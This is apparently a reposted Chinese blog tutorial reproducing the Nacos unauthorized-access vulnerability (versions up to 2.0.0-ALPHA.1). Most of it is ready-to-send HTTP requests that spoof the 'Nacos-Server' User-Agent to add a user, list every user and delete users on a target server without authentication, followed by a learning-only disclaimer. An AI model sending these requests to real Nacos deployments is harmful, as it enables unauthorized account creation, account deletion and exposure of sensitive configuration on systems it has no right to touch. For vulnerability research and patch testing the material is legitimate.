码上快乐

相关内容   简体   繁体

Nacos 未授权漏洞复现

本文转载自  查看原文  2021-02-04 13:52  1403    漏洞复现/ Web安全/ 技巧

简介

影响:
未授权获得相关服务配置,泄露大量配置敏感信息

影响版本
Nacos <= 2.0.0-ALPHA.1

漏洞复现

post方式新增用户:

POST /nacos/v1/auth/users?username=yangy&password=yangy HTTP/1.1
Host: XXX
User-Agent: Nacos-Server
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip


登录口进行登录,确认用户可登陆:


get方式获得其他用户信息:

GET /nacos/v1/auth/users?pageNo=1&pageSize=999 HTTP/1.1
Host: XXX
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip


delete方式进行删除:

DELETE /nacos/v1/auth/users?username=yangy HTTP/1.1
Host: XXX
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip


再次查询用户确认已经删除:


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 Rsync未授权漏洞复现 nacos 未授权访问漏洞 漏洞复现 - ZooKeeper未授权访问漏洞 redis未授权访问漏洞复现 JBOSS未授权访问漏洞复现 Redis未授权访问漏洞复现与利用 ldap未授权访问漏洞复现 mongodb未授权访问漏洞 复现 rsync未授权访问漏洞复现 宝塔未授权访问-漏洞复现
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM